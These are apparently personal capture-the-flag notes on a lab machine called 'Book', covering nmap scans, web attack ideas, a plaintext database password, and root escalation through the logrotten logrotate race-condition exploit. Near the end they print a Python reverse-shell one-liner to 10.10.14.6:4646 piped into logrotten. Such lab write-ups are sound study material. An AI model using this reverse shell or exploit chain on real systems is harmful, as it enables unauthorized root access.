Machine - Book - Linux - Medium

Machine - Book - Linux - Medium

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
|   /admin/: Possible admin folder
|_  /admin/index.php: Possible admin folder
|_http-server-header: Apache/2.4.29 (Ubuntu)

fuzzing

• Cnould create a user for the normal portal
• there is a /admin portal that doesnt allow to create users
• in the page as normal user I can upload things…
• we have another user admin@book.htb
• there is a place to send email… maybe we can do some xss
  • didn-t work :(
• sql injection (nop)
• sql truncation

reader → root

• I could connect to the db and try to get the password of admin…
• no suid that I could see
• no sudo -l
• in the database the password is not salt or crypted Sup3r_S3cur3_P455
• maybe something is executed at regular intervals…
  • let’s use https://github.com/DominicBreuker/pspy
  • I see
    • /root/log.sh
    • /root/reset.sh
    • /root/clean.sh
    • but I cannot do anything :(
• I see in the suid something about lxc and there is an exploit…
  • no way, i don’t have the lxc group
• I saw that there is a logrotate every know and then executed as a root
  • and there is an exploit for that https://github.com/whotwagner/logrotten
  • exploits a race condition, making it possible to write as theuser root
  • we could try to copy the authorized_keys to /root/.ssh/authorized_keys

echo “python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.6”,4646));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’” & ./logrotten -d -p ./payloadfile /home/reader/backups/access.log

	```
	
## Machines

![[Machine - Previse]]

![[Machine - Explore]]

![[Machine - Seal]]

![[Machine - Writer (Abandoned)]]


![[Machine - BountyHunter]]